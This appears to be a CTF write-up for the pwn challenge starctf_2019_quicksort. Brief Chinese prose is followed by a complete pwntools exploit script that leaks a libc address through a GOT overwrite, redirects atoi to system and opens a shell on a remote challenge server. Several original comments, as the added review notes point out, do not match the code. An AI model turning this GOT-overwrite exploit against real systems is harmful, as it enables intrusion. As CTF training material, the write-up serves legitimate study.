starctf_2019_quicksort
首先，检查一下程序的保护机制。
然后，用 IDA 分析一下：程序存在栈溢出，可以把 ptr 指针覆盖掉，因此我们可以实现任意地址写。
那么，我们可以把 free 的 GOT 表项修改为 main 函数的地址，这样就可以多次利用该漏洞；同时后面的 printf 可以用来泄露地址。
#coding:utf8
# Exploit script accompanying the writeup for starctf_2019_quicksort (pwntools; Python 2
# syntax -- note the `print` statements). Per the writeup's prose, a stack overflow lets the
# program's `ptr` pointer be overwritten, which yields an arbitrary-address write; that write
# is used twice below, with a leak in between.
from pwn import *
from LibcSearcher import *  # imported but not used anywhere in this script
# Local variant (commented out): run the binary with the matching 32-bit libc preloaded.
#sh = process('./starctf_2019_quicksort',env={'LD_PRELOAD':'./libc-2.23_x86.so'})
sh = remote('node3.buuoj.cn',26439)  # remote challenge instance used by the writeup
elf = ELF('./starctf_2019_quicksort')
libc = ELF('./libc-2.23_x86.so')  # libc matching the target; symbol offsets are read from it
gets_got = elf.got['gets']
atoi_got = elf.got['atoi']
# Hard-coded program address (presumably no PIE -- the prose mentions checking protections).
# The comment below calls this "main"; confirm against the binary.
vuln_addr = 0x08048816
sh.sendlineafter('sort?','1')
# Overwrite free's GOT entry with main, and leak puts's address at the same time.
# NOTE(review): the original comment says "puts", but the code below actually reads the GOT
# entry of gets (gets_got) and names the result gets_addr.
# Payload layout as written: the target address as a decimal string, NUL-padded to 0x10 bytes,
# then p32(1)*2, p32(0), and the pointer being overwritten (gets_got) -- presumably the `ptr`
# from the writeup's prose; the meaning of the middle fields is not derivable from this script.
payload = str(vuln_addr).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(gets_got)
sh.sendlineafter('number:',payload)
sh.recvuntil('result:\n')
# The leaked value is read back as a decimal; the +0x100000000 suggests the program prints it
# as a signed 32-bit number, so this recovers the unsigned address -- confirm if the leak looks off.
gets_addr = int(sh.recvuntil('\n',drop = True)) + 0x100000000
libc_base = gets_addr - libc.sym['gets']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
sh.sendlineafter('sort?','1')
# Second write, same layout, now carrying system's address. Subtracting 0x100000000 mirrors the
# adjustment applied to the leak above (presumably to fit the signed range the target parses);
# the -0x4 offset from atoi's GOT entry is not explained by this script -- confirm against the binary.
payload = str(system_addr - 0x100000000).ljust(0x10,'\x00') + p32(1)*2 + p32(0) + p32(atoi_got - 0x4)
sh.sendlineafter('number:',payload)
#getshell
# Final round: the "number" prompt is answered with the string '/bin/sh\x00' rather than a number.
sh.sendlineafter('sort?','1')
sh.sendlineafter('number:','/bin/sh\x00')
sh.interactive()